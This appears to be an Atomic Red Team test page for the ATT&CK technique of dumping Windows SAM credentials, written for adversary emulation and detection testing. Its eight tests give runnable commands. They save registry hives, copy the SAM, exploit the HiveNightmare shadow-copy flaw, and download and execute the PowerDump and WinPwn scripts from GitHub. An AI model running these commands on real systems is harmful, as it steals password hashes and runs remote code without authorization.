T1003.002
OS Credential Dumping: Security Account Manager
Description from ATT&CK
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
Alternatively, the SAM can be extracted from the Registry with Reg:
- reg save HKLM\sam sam
- reg save HKLM\system system
Creddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)
Notes:
- RID 500 account is the local, built-in administrator.
- RID 501 is the guest account.
- User accounts start with a RID of 1,000+.
Atomic Tests
Atomic Test #1 - Registry dump of SAM, creds, and secrets
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: windows
auto_generated_guid: 5c2571d0-1572-416d-9676-812e64ca9f44
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
reg save HKLM\sam %temp%\sam
reg save HKLM\system %temp%\system
reg save HKLM\security %temp%\security
Cleanup Commands:
1
2
3
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul
Atomic Test #2 - Registry parse with pypykatz
Parses registry hives to obtain stored credentials.
Will create a Python virtual environment within the External Payloads folder that can be deleted manually post test execution.
Supported Platforms: windows
auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| venv_path | Path to the folder for the tactics venv | string | PathToAtomicsFolder..\ExternalPayloads\venv_t1003_002 |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
"#{venv_path}\Scripts\pypykatz" live lsa
Dependencies: Run with powershell!
Description: Computer must have python 3 installed
Check Prereq Commands:
1
if (Get-Command py -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
2
3
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://www.python.org/ftp/python/3.10.4/python-3.10.4-amd64.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe"
Start-Process -FilePath "PathToAtomicsFolder\..\ExternalPayloads\python_setup.exe" -ArgumentList "/quiet InstallAllUsers=1 PrependPath=1 Include_test=0" -Wait
Description: Computer must have venv configured at #{venv_path}
Check Prereq Commands:
1
if (Test-Path -Path "#{venv_path}") { exit 0 } else { exit 1 }
Get Prereq Commands:
1
py -m venv "#{venv_path}"
Description: pypykatz must be installed
Check Prereq Commands:
1
if (Get-Command "#{venv_path}\Scripts\pypykatz" -errorAction SilentlyContinue) { exit 0 } else { exit 1 }
Get Prereq Commands:
1
& "#{venv_path}\Scripts\pip.exe" install --no-cache-dir pypykatz 2>&1 | Out-Null
Atomic Test #3 - esentutl.exe SAM copy
Copy the SAM hive using the esentutl.exe utility This can also be used to copy other files and hives like SYSTEM, NTUSER.dat etc.
Supported Platforms: windows
auto_generated_guid: a90c2f4d-6726-444e-99d2-a00cd7c20480
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| file_path | Path to the file to copy | path | %SystemRoot%/system32/config/SAM |
| file_name | Name of the copied file | string | SAM |
| copy_dest | Destination of the copied file | string | %temp% |
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name}
Cleanup Commands:
1
del #{copy_dest}\#{file_name} >nul 2>&1
Atomic Test #4 - PowerDump Hashes and Usernames from Registry
Executes a hashdump by reading the hashes from the registry.
Supported Platforms: windows
auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193
Inputs:
None
Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)
1
2
3
Write-Host "STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON" -fore green
Import-Module "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Invoke-PowerDump
Dependencies: Run with powershell!
Description: PowerDump script must exist on disk at specified location Check Prereq Commands:
1
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1") {exit 0} else {exit 1}
Get Prereq Commands:
1
2
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
Invoke-Webrequest -Uri "https://raw.githubusercontent.com/BC-SECURITY/Empire/c1bdbd0fdafd5bf34760d5b158dfd0db2bb19556/data/module_source/credentials/Invoke-PowerDump.ps1" -UseBasicParsing -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PowerDump.ps1"
Atomic Test #5 - dump volume shadow copy hives with certutil
Dump hives from volume shadow copies with the certutil utility, exploiting a vulnerability known as "HiveNightmare" or "SeriousSAM". This can be done with a non-admin user account. CVE-2021-36934
Supported Platforms: windows
auto_generated_guid: eeb9751a-d598-42d3-b11c-c122d9c3f6c7
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_hive | Hive you wish to dump | string | SAM |
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |
Attack Commands: Run with command_prompt!
1
for /L %a in (1,1,#{limit}) do @(certutil -f -v -encodehex "\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy%a\Windows\System32\config\#{target_hive}" %temp%\#{target_hive}vss%a 2 >nul 2>&1) & dir /B %temp%\#{target_hive}vss*
Cleanup Commands:
1
for /L %a in (1,1,#{limit}) do @(del %temp%\#{target_hive}vss%a >nul 2>&1)
Atomic Test #6 - dump volume shadow copy hives with System.IO.File
Dump hives from volume shadow copies with System.IO.File. CVE-2021-36934
Supported Platforms: windows
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
Inputs:
| Name | Description | Type | Default Value |
|---|---|---|---|
| target_hive | Hive you wish to dump | string | SAM |
| limit | Limit to the number of shadow copies to iterate through when trying to copy the hive | integer | 10 |
Attack Commands: Run with powershell!
1
2
3
4
1..#{limit} | % {
try { [System.IO.File]::Copy("\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy$_\Windows\System32\config\#{target_hive}" , "$env:TEMP\#{target_hive}vss$_", "true") } catch {}
ls "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Cleanup Commands:
1
2
3
1..#{limit} | % {
rm "$env:TEMP\#{target_hive}vss$_" -ErrorAction Ignore
}
Atomic Test #7 - WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes
Loot local Credentials - Dump SAM-File for NTLM Hashes technique via function of WinPwn
Supported Platforms: windows
auto_generated_guid: 0c0f5f06-166a-4f4d-bb4a-719df9a01dbb
Inputs:
None
Attack Commands: Run with powershell!
1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
samfile -consoleoutput -noninteractive
Atomic Test #8 - Dumping of SAM, creds, and secrets(Reg Export)
Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Used reg export to execute this behavior Upon successful execution of this test, you will find three files named, sam, system and security in the %temp% directory.
Supported Platforms: windows
auto_generated_guid: 21df41be-cdd8-4695-a650-c3981113aa3c
Inputs:
None
Attack Commands: Run with command_prompt! Elevation Required (e.g. root or admin)
1
2
3
reg export HKLM\sam %temp%\sam
reg export HKLM\system %temp%\system
reg export HKLM\security %temp%\security
Cleanup Commands:
1
2
3
del %temp%\sam >nul 2> nul
del %temp%\system >nul 2> nul
del %temp%\security >nul 2> nul